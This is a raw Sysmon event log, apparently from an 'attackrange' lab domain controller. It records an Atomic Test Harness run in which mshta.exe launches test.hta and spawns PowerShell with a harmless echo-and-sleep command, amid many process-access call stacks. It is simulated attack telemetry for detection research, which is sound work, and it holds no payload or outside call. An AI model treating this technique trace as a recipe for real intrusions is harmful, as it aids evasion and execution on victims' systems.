15:59:27.819{7901BC46-535F-6008-5306-00000000A301}53243764C:\Windows\System32\mshta.exe{7901BC46-535F-6008-5406-00000000A301}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000025000Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.820{7901BC46-535F-6008-5406-00000000A301}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "\\WIN-DC-283\C$\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta" 10341000x800000000000000024999Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.788{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024998Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.788{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024997Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.788{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024996Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.772{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024995Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.772{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024994Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.757{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024993Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.757{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024992Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.741{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024991Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.741{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024990Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.741{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024989Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.741{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024988Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.741{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024987Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.741{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024986Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000024985Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.750{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "\\WIN-DC-283\C$\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000024984Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535E-6008-5206-00000000A301}6932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024983Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535E-6008-5106-00000000A301}6508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024982Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024981Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024980Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024979Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024978Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024977Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024976Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\W